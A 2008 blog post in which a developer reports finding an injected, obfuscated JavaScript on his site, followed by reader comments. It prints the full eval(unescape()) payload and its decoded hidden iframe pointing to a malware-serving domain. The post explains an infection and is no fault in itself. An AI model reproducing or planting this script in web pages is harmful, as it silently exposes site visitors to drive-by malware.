Help needed – Part 2

First, I would like to thank you all for the precious help you gave me with your comments.

Finally, after hours spent dancing naked to the bone in the streets invoking for Manitu, and even more hours trying to explain the police why I was dancing naked, I found the problem.

Somewhere around the site there was this script

1
$="%6fp%3d%22%2524%253d%2522dw(d%2563%2573(cu%252c1%2534)%2529;%2522;%22;cu%3d%22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;bqgx{l:w{y;xp;sfv;64c}p`|)%25$$4|q}s|`),$*(;}rfuyq*(;p}b*%22;da%3d%22fqb0})-~ug0Qbbqi87e~%257F7%3c7tfu7%3c7dxb7%3c7vyb7%3c7fyv7%3c7huc7%3c7fuc7%3c7wxd7%3c7u~y7%3c7ud~7%3c7|uf7%3c7dgu79+fqb0|)-~ug0Qbbqi87q7%3c7r7%3c7s7%3c7t7%3c7u7%3c7v7%3c7w7%3c7x7%3c7y7%3c7z7%3c7{7%3c7|7%3c7}7%3c7~7%3c7%257F7%3c7`7%3c7a7%3c7b7%3c7c7%3c7%22;ca%3d%22%2566u%256ect%2569on %2564cs%2528%2564%2573,e%2573){%2564s%253dun%2565sca%2570e%22;db%3d%22d7%3c7e7%3c7f7%3c7g7%3c7h7%3c7i7%3c7j79+fqb0~)-~ug0Qbbqi8!%3c%2522%3c#%3c$%3c%25%3c&%3c%27%3c(%3c)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7i7M-t)%3ewudVe||Iuqb89+yv8t)%3ewudTqi89.#9d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi89;%25229+u|cu%22;cd%3d%22%253dst%252bSt%2572ing%252efro%256dCh%2561%2572Cod%2565%2528(t%256dp.c%2568a%25%22;cz%3d%22%2566unc%2574io%256e%2520%2563z%2528%2563z)%257bret%2575%2572n%2520c%2561%252bcb+%2563c%252bcd+%2563%2565+cz%253b};%22;st%3d%22%2573%2574%253d%2522%2524%253ds%2574;%2564%2563s%2528%2564%2561%252b%2564b%252b%2564c%252bd%2564+%2564%2565%252c%25310%2529;%2564w%2528s%2574%2529%253b%2573%2574%253d%2524;%2522;%22;dc%3d%220d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi899+yv8d)K7t7M,%25209d)K7t7M-!+d)K7}7M-t)%3ewud]%257F~dx89;!+ve~sdy%257F~0S]^8t%3c}%3ci9kfqb0b-888i;8#:t99;8}Nt9:#9;t9+budeb~0b+mfqb0t-7fuc|%257Fh%3es%257F}7+fqb0iSx!%3ciSx%2522%3c%22;ce%3d%2272Co%2564e%2541t%2528%2530)%255e%2528%25270x%2530%2530%2527+es)%2529%2529;}%257d%22;dd%3d%22}Sx%3ctSx%3c}^}+yv8d)K7i7M,%2522%2520%2520%279kd)K7i7M0-0%2522%2520%2520%27+m}^}-S]^8d)K7t7M%3cd)K7}7M%3cd)K7i7M9+iSx!-|)K888d)K7i7M6%2520hQQ9;}^}950&5##950%2522&M+iSx%2522-|)K8888d)K7i7M6%2520h##!!9..#9;}^}950!%25209M+}Sx%22;de%3d%22-|)K88d)K7}7M;}^}950%2522%259M+yv888d)K7t7M:%25229.-%252096688d)K7t7M:%25229,-)99tSx-~)K8d)K7t7M50!%25209M+u|cu0tSx-|)K88d)K7t7M:&950%2522%279M+4-4%3ebu`|qsu8t%3ciSx%2522;}Sx;iSx!;tSx;})Kd)K7}7M%3d!M;7%3es%257F}79+%22;cb%3d%22%2528ds)%253bst%253dtm%2570%253d%2527%2527;for%2528%2569%253d0;%2569%253cds.l%256%22;cc%3d%225%256egt%2568;%2569+%252b)%257btmp%253dd%2573.sl%2569ce(%2569,i+%2531);s%2574%22;dz%3d%22%2566%2575nct%2569o%256e %2564w(t%2529{ca%253d%2527%252564%25256%2566c%252575m%2565n%252574%2525%2532e%252577%2572%2525%25369te%252528%2525%2532%2532%2527;c%2565%253d%2527%252522)%2527;cb%253d%2527%25253csc%252572%252569%252570t%2525%25320l%2561n%252567%2575%2561%25256%2537e%25253d%25255c%252522jav%2561%2573c%2572%252569p%252574%25255c%252522%25253%2565%2527;cc%253d%2527%25253c%25255c%25252fs%252563rip%252574%25253e%2527;%2565v%2561%256c(un%2565s%2563ape%2528t))%257d;%22;%69%66 (d%6f%63u%6dent%2ecoo%6bi%65.in%64ex%4ff(%27r%665f%36%64s%27%29%3d%3d-1){%73c(%27rf%35%66%36%64%73%27,2,%37);e%76al%28%75%6eesc%61p%65(dz%2b%63z%2bo%70+st%29+%27dw(%64%7a+%63z($%2bst)%29;%27)}el%73e%7b%24%3d%27%27};functio%6e %73c%28cnm%2cv,e%64){v%61r %65x%64%3dnew Da%74e(%29;ex%64.s%65tD%61te%28ex%64.g%65%74Da%74%65()%2be%64%29%3bdo%63u%6den%74.c%6foki%65%3dc%6em%2b%20%27%3d%27 +e%73c%61pe%28v%29+%27;e%78pi%72%65s%3d%27+exd.t%6fGM%54%53%74ri%6e%67(%29%3b};";eval(unescape($));document.write($);

That once evaluated returns

1
<div style="visibility:hidden"><iframe src="http://ewbyuno.com/ld/grb/" width=100 height=80></iframe></div>

This page redirects to http://ewbyuno.com/cgi-bin/in.cgi?p=grobin that sometimes tries to install a component called “dexplore.exe”, otherwise redirects to google.com

The funny thing is that when I googled for ewbyuno I found only two results

The domain is registered to Prokofyev Yaroslav, and the site is hosted on a server owned by SoftLayer Technologies Inc. This company even has a “page” on Wikipedia

On the same server there are 17 domains… and guess the names? ang2uno.com, bevjuno.com… owned of course by Prokofyev

So this company seems to have a server dedicated to badware diffusion. I emailed them this message:

Hello,
my name is Emanuele Feronato and I recently discovered that one of your servers is hosting domains called ang2uno.com, bevjuno.com, ewbyuno.com (and so on) that are distributing badware after someone injects in various blog and forums hidden javascripts to call your pages from remote servers, with iframes pointing at (as example) http://ewbyuno.com/ld/grb/

One of my sites, emanueleferonato.com, was a “victim” of this process and now google flags it as a site that may harm your computer.

I would like to know if you are informed about it and how do you think to manage this problem.

Obviuosly I am going to explain to google and stopbadware.org what happened because I don’t want my site to be flagged as badware when the threat comes from your servers.

About half of my traffic comes (came?) from Google and should it take too long to remove the badware flag I may consider legal actions.

Regards,
Emanuele Feronato

Let’s see what happens.

Now, I want to thank you for feedback and support and I apologize for any virus, trojan and badware you got from this site.

See you soon, I have some tutorials to write.

Obviously, now the site is clean.

Rate this post: 1 Star2 Stars3 Stars4 Stars5 Stars (No Ratings Yet)
Loading ... Loading ...
Be my fan on Facebook and follow me on Twitter! Exclusive content for my Facebook fans and Twitter followers

This post has 19 comments

  1. Paulo Moreira

    on January 15, 2008 at 12:24 pm

    Hope everything gets sorted now! I followed what happen to you and I imagine that this situation put you in lots of stress. Hope that flag from google disappears because your posts are wicked! I like the way you explain the technical and the business part.You rock, mate!

  2. Yaig

    on January 15, 2008 at 12:45 pm

    Hi,

    I would be curios, how the script got in your sites code in the first place?!
    (In order, not to happen again.)

    Regards,
    yaig

  3. Endre

    on January 15, 2008 at 1:07 pm

    Hello.

    Have you figured out how your site got infected in the first place?

    Endre
    PS: Greate site by the way!

  4. Lachy

    on January 15, 2008 at 3:19 pm

    Hey,

    I had a game idea and i wanted to know if you could help me out a tad ;) My email is in the wordpress admin :)

    Thanks

  5. robby

    on January 15, 2008 at 3:30 pm

    yep, I really hope this gets resolved Emanuele, and hopefully google will remove flagged status on your website. Keep us posted.

    :]

  6. Monkios

    on January 15, 2008 at 4:01 pm

    I’m really glad this has been found.

    Hoping to see you continue.

  7. Fetz

    on January 15, 2008 at 7:53 pm

    I think that this site can answers all your question:

    “Finjan Uncovers Insidious New Variant of Crimeware Toolkit
    Infecting More Than 10,000 US Websites in December
    In its just-released Malicious Page of the Month report, Finjan explores the “random js toolkit”

    http://www.finjan.com/Pressrelease.aspx?id=1820&PressLan=1819&lan=3

  8. emanuel

    on January 15, 2008 at 9:12 pm

    good luck cool u sove it

  9. Frederik J

    on January 15, 2008 at 9:18 pm

    That’s good news. :-)
    I stay tuned!

  10. Shiv

    on January 16, 2008 at 2:23 pm

    Hi emanuele,

    Great that you started finally to mend those badwares. But as much as I know, that fool of
    bevjuno will even answer your mail .

    Anyways, the world stands on hope.

  11. Hawdon

    on January 16, 2008 at 6:00 pm

    Im sorry to say but when I googeld this site up the “this site might harm you” text is still there… Just saying…

  12. Gonzalo

    on January 17, 2008 at 3:15 am

    OMG.

    I hope they delete the badware, in any case you can make legal actions saying they lowered your page visits, just by showing them the logs

  13. Dog Gon Mad

    on January 17, 2008 at 5:26 pm

    Hey you were unflaged at around 3:00 this morning. and also thankyou for the great tutorials.
    -DGM

  14. Dog Gon Mad

    on January 17, 2008 at 5:28 pm

    opps, 3:00 GMT-07:00

  15. Josh

    on January 17, 2008 at 8:21 pm

    Hey im making a birds eye view shooter and i am haveing troubles with arrange movieclips i bring in with actionscript. How do you attach movieclip and arrange it to back? I searched google but i couldnt find anything.
    i would appreciate the help.

  16. Ed

    on January 17, 2008 at 10:28 pm

    Josh you want to look up Depths.

  17. Dog Gon Mad

    on January 21, 2008 at 3:02 am

    Hey Emanuele, Google has up another part of the site,Experiment: monetizing a Flash game : Emanuele Feronato – italian …
    Also thankyou for your tuts they have really helped me.
    -DGM

  18. Emanuele Feronato

    on January 21, 2008 at 9:37 am

    I know, the entire process of removing the ad may take up to some weeks.

  19. Brecheen

    on August 23, 2009 at 7:09 am

    Hi, this is really nice post i like it so much
    thank very much